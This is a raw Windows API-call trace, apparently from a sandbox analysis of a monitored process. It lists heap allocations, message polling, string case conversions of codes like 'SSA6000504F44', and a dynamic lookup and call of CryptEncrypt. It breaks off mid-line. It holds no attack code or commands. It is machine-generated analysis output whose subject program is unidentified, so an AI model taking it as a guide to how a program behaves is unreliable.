0 [0267.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0267.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0267.645] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0267.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0267.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0267.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0267.646] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0267.646] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.646] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0267.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0267.646] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0267.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0267.646] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0267.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0267.646] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0267.646] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0267.647] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0267.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0267.647] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0267.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0267.647] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0267.647] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0267.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0267.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0267.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0267.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0267.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0267.647] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0267.647] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.647] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.647] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0267.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0267.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0267.648] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0267.648] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0267.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0267.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0267.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0267.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0267.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0267.648] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0267.648] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.648] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0267.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0267.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0267.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0267.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0267.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0267.648] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0267.648] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.649] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0267.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0267.649] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0267.649] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0267.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0267.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0267.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0267.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0267.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0267.649] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0267.649] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.649] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0267.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0267.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0267.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0267.649] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0267.650] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0267.650] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0267.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0267.650] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0267.650] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0267.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0267.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0267.650] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.650] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0267.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0267.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0267.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0267.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0267.650] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0267.650] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.650] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0267.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0267.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0267.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0267.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0267.651] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.651] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.651] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0267.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0267.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0267.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0267.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8c8 [0267.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0267.651] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0267.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0267.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0267.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0267.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0267.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0267.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0267.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0267.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0267.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0267.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0267.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0267.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0267.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0267.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0267.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1748 [0267.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0267.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0267.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0267.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0267.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0267.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0267.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1938 | out: hHeap=0x25c0000) returned 1 [0267.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1938 [0267.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0267.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0267.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0267.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0267.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0267.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0267.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0267.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0267.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0267.653] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0267.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0267.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0267.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0267.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0267.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0267.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0267.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0267.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0267.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0267.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0267.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0267.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0267.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0267.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0267.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0267.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0267.654] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0267.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0267.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0267.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0267.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0267.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0267.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0267.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0267.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0267.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0267.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0267.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0267.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0267.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0267.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0267.655] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0267.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0267.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd) returned 0x34aaaa8 [0267.656] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aaaa8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0267.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0267.656] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0267.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0267.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b3ba0 [0267.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0267.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0267.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0267.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1368 [0267.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0267.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0267.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0267.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0267.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0267.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0267.657] CryptEncrypt (in: hKey=0xaa57a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x0, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x8) returned 1 [0267.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0267.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0267.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0267.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3a0 [0267.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0267.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0267.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0267.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0267.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0267.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0267.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0267.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0267.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0267.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0267.658] HeapFree (in: 